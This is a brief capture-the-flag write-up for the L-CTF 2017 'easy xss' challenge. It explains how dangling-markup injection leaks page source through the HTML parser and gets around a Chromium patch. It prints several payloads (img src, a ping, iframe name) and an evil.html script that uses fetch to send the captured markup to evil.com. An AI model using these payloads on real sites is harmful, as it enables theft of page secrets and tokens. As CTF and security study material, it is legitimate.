L-CTF 2017 easy xss

2 ways to solve it , all in the writeup

the key point is how to leak the information through the html parser

from https://bugs.chromium.org/p/chromium/issues/detail?id=680970

1
<img src='//evil.com/?p=

the src attribute would eat the html sourcecode until next ‘

to make it easier, I use the old chrome to perform this challenge

but,there is still some skills to bypass the patch in the stable version

there are 2 ways:

need interactive

1
<a ping='//evil.com/?p=

it’s hard to use in a real attack

without interactive

1
<iframe src='//evil.com/evil.html' name='

evil.html

1
2
3
<script>
fetch('//evil.com/?p='+escape(name))
</script>

then we get the leak sourcecode,which contains the flag.